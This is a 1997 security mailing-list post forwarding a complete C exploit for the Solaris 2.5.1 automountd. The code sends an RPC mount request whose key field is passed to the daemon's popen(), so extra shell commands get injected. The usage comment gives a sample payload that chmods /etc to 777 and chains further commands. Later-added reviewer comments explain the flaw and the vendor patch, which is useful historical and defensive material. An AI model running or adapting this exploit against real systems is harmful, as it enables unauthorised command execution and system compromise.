Solaris 2.5.1 automountd exploit (fwd)
From: aleph1 () DFW NET (Aleph One)
Date: Wed, 26 Nov 1997 02:02:13 -0600
From anonymous:
--
/* this is really dumb automountd exploit, tested on solaris 2.5.1
   ./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on,
   map is executed via popen with key given as argument,
   read automount(1M) patch 10465[45] fixes this */

/*
 * Reviewer notes (defensive context; not part of the original post):
 *
 *  - What the program does: it builds one AUTOFS_MOUNT RPC request whose
 *    four string fields (path, map, name/key, opts) are copied verbatim
 *    from argv, sends it to the automountd on the local host, and prints
 *    the integer status the daemon returns.  No input is validated or
 *    escaped anywhere in this file.
 *  - Vulnerability class: command injection in the daemon.  By the
 *    author's own description the daemon runs an executable map via
 *    popen() with the client-supplied key as its argument; popen() hands
 *    that string to /bin/sh, so ';' and other shell metacharacters in the
 *    key are interpreted as additional commands.  The client handle is
 *    created with clnt_create(), whose default authentication flavour is
 *    AUTH_NONE, so no credentials accompany the request; whether the
 *    daemon performed any caller check at all is not visible here —
 *    NOTE(review): confirm against the vendor patch README.
 *  - Mitigation: the vendor patch the author names (10465[45]).  The
 *    general rule it illustrates: never route data that arrives over an
 *    RPC/network boundary through popen()/system(); fork/exec with an
 *    explicit argv instead, validate field contents against the expected
 *    character set, and restrict who may reach the service.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>

/* TI-RPC nettype passed to clnt_create(): "datagram_v" selects the visible
   connectionless transports.  The author's "XXX" marks this as a guess. */
#define AUTOTS "datagram_v" /* XXX */

/* Print the command-line synopsis and exit.  Note the exit status is 0
   even though this is the error path (the whole file exits 0 everywhere). */
void usage(char *s) {
	printf("Usage: %s mountpoint map key [opts]\n", s);
	exit(0);
}

/*
 * XDR (de)serialiser for struct mntrequest: four variable-length strings,
 * each bounded by the A_MAX* limits from autofs_prot.h.  Written in K&R
 * style; `buf' is declared but never used (rpcgen-output boilerplate —
 * presumably copied from the generated autofs_prot_xdr.c, verify).
 * Returns FALSE on the first field that fails to encode/decode.
 */
bool_t xdr_mntrequest(xdrs, objp)
	register XDR *xdrs;
	mntrequest *objp;
{
	register long *buf;

	if (!xdr_string(xdrs, &objp->name, A_MAXNAME))
		return (FALSE);
	if (!xdr_string(xdrs, &objp->map, A_MAXNAME))
		return (FALSE);
	if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS))
		return (FALSE);
	if (!xdr_string(xdrs, &objp->path, A_MAXPATH))
		return (FALSE);
	return (TRUE);
}

/* XDR (de)serialiser for struct mntres: a single int status.  `buf' is
   again unused. */
bool_t xdr_mntres(xdrs, objp)
	register XDR *xdrs;
	mntres *objp;
{
	register long *buf;

	if (!xdr_int(xdrs, &objp->status))
		return (FALSE);
	return (TRUE);
}

/*
 * Entry point.  Implicit `int' return type (pre-C99 C); modern compilers
 * warn or reject this.
 *
 *   argv[1] -> req.path, argv[2] -> req.map, argv[3] -> req.name (the key),
 *   argv[4] -> req.opts.
 *
 * Steps: resolve the local hostname, open an RPC client to AUTOFS_PROG /
 * AUTOFS_VERS over AUTOTS, issue AUTOFS_MOUNT with a 5-second timeout,
 * report either the RPC failure or the daemon's status, destroy the handle.
 * Every exit path, including failures, returns status 0.
 */
main(int argc, char *argv[]) {
	char hostname[MAXHOSTNAMELEN];
	CLIENT *cl;
	enum clnt_stat stat;
	struct timeval tm;
	struct mntrequest req;
	struct mntres result;

	if (argc < 4)
		usage(argv[0]);

	/* Request fields are raw argv pointers: nothing is copied, checked
	   or escaped before it goes on the wire. */
	req.path=argv[1];
	req.map=argv[2];
	req.name=argv[3];
	req.opts=argv[4];

	if (gethostname(hostname, sizeof(hostname)) == -1) {
		perror("gethostname");
		exit(0);
	}

	/* Talks to the daemon on this host; default auth flavour (AUTH_NONE). */
	if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
		clnt_pcreateerror("clnt_create");
		exit(0);
	}

	/* 5-second call timeout. */
	tm.tv_sec=5;
	tm.tv_usec=0;
	stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req,
		       xdr_mntres, (char *)&result, tm);
	if (stat != RPC_SUCCESS)
		clnt_perror(cl, "mount call");
	else
		printf("mntres = %d.\n", result.status);
	clnt_destroy(cl);
}